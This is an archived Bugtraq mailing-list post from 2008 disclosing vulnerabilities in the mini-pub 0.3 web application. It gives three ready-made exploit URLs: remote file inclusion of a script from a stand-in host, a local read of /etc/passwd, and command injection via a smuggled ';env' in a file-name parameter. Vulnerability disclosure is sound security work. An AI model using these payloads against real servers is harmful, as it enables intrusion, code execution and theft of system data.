[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

mini-pub 0.3 multiple vulnerabilities

To: bugtraq <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: mini-pub 0.3 multiple vulnerabilities
From: "muuratsalo experimental hack lab" <muuratsalo@xxxxxxxxx>
Date: Thu, 7 Feb 2008 14:43:31 +0100

mini-pub 0.3 multiple vulnerabilities

download   http://sourceforge.net/projects/mini-pub/

author     muuratsalo
contact    muuratsalo[at]gmail.com

exploits
1. remote file inclusion
http://localhost/mini-pub.php/front-end/img.php?sFileName=http://site.com/cmd.txt?

2. local file inclusion
http://localhost/mini-pub.php/front-end/cat.php?sFileName=/etc/passwd

3. command execution
http://localhost/mini-pub.php/front-end/cat.php?sFileName=a%3Benv

Prev by Date: [security bulletin] HPSBMA02309 SSRT080013 rev.1 - HP Select Identity Software, Remote Unauthorized Access
Next by Date: Re: Logs visualization in WS_FTP Server Manager 6.1.0.0
Previous by thread: [security bulletin] HPSBMA02309 SSRT080013 rev.1 - HP Select Identity Software, Remote Unauthorized Access
Next by thread: [DSECRG-08-013] Modx 0.9.6.1, 0.9.6.1p1 Multiple Security Vulnerabilities
Index(es):
- Date
- Thread